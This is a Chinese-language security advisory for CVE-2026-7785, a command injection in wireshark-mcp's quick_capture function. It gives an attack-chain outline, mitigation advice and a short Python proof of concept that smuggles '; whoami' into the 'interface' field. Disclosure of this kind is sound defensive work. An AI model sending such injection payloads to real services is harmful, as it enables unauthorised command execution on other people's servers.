IPBUF安全漏洞报告
English
CVE-2026-7785 CVSS 7.3 高危

CVE-2026-7785 wireshark-mcp OS命令注入漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7785
漏洞类型
操作系统命令注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
A-G-U-P-T-A wireshark-mcp

相关标签

OS命令注入RCEwireshark-mcpCVE-2026-7785高危漏洞

漏洞概述

A-G-U-P-T-A开发的wireshark-mcp项目中存在严重的安全漏洞。该漏洞源于pyshark_mcp.py文件中的quick_capture函数未能正确过滤用户输入,导致操作系统命令注入。攻击者无需认证且无需用户交互即可通过网络远程发起攻击。由于该项目采用滚动发布模式,暂无具体受影响版本号。目前漏洞利用代码已被公开披露,项目方尚未对此做出响应,存在较高安全风险。

技术细节

该漏洞位于A-G-U-P-T-A/wireshark-mcp项目的pyshark_mcp.py脚本中,具体影响quick_capture函数。该函数通常用于调用系统命令(如tshark)来捕获网络数据包。由于代码在构建命令执行语句时,直接将未经过滤或消毒的用户输入拼接到系统Shell命令中,导致了命令注入漏洞。在技术实现上,攻击者可以通过精心构造的恶意Payload,利用Shell元字符(如;, &, |等)截断原始命令并追加任意操作系统命令。由于CVSS向量显示无需认证(PR:N)且无需交互(UI:N),攻击者可以向受影响的服务端接口发送特制请求。一旦利用成功,攻击者即可获得底层操作系统的执行权限。尽管CVSS评分对机密性、完整性和可用性的影响评估为“低”,但在实际环境中,这往往意味着攻击者可以读取敏感文件、安装后门或进一步横向移动。

攻击链分析

STEP 1
侦察
攻击者扫描网络或搜索GitHub,寻找部署了A-G-U-P-T-A/wireshark-mcp服务且启用了quick_capture功能的目标。
STEP 2
武器化
攻击者构造包含Shell元字符(如分号或管道符)的恶意Payload,旨在截断原始tshark命令并注入任意系统指令。
STEP 3
交付
攻击者通过HTTP请求向目标服务器发送包含恶意Payload的数据包,该数据包被传递给pyshark_mcp.py中的quick_capture函数。
STEP 4
利用
由于quick_capture函数未对输入进行过滤,后端直接将Payload拼接到系统命令中执行,导致攻击者的恶意命令在服务器上运行。
STEP 5
行动
攻击者利用已获得的执行权限执行后续操作,如读取敏感文件、建立反弹Shell或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_os_command_injection(target_url): """ PoC for CVE-2026-7785 OS Command Injection in wireshark-mcp. This script sends a malicious payload to the quick_capture function. """ # The payload attempts to execute 'whoami' on the target system # Assuming the vulnerable parameter injects into a shell command. injection_payload = "; whoami" # Construct the data payload based on potential API structure data = { "interface": injection_payload, "duration": "1" } try: print(f"[*] Sending exploit payload to {target_url}...") response = requests.post(target_url, data=data, timeout=5) # Check if the response contains signs of command execution if response.status_code == 200: print("[+] Request sent successfully.") print("[!] Response body:") print(response.text) # Heuristic to check if command executed (e.g., finding a username) if "root" in response.text or "www-data" in response.text or "uid" in response.text: print("[+] Potential command injection detected!") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost:8000/quick_capture" exploit_os_command_injection(target)

影响范围

A-G-U-P-T-A wireshark-mcp (Commit edaf604416fbc94a201b4043092d4a1b09a12275)
A-G-U-P-T-A wireshark-mcp (Commit 400c3da70074f22f3cce7ccb65304cafc7089c89)

防御指南

临时缓解措施
建议立即停止使用受影响版本的wireshark-mcp服务,直到官方发布修复补丁。如果无法立即停止,应在网络边界部署严格的访问控制策略,仅允许特定IP地址访问相关接口,并利用WAF等安全设备拦截包含Shell注入特征的恶意请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表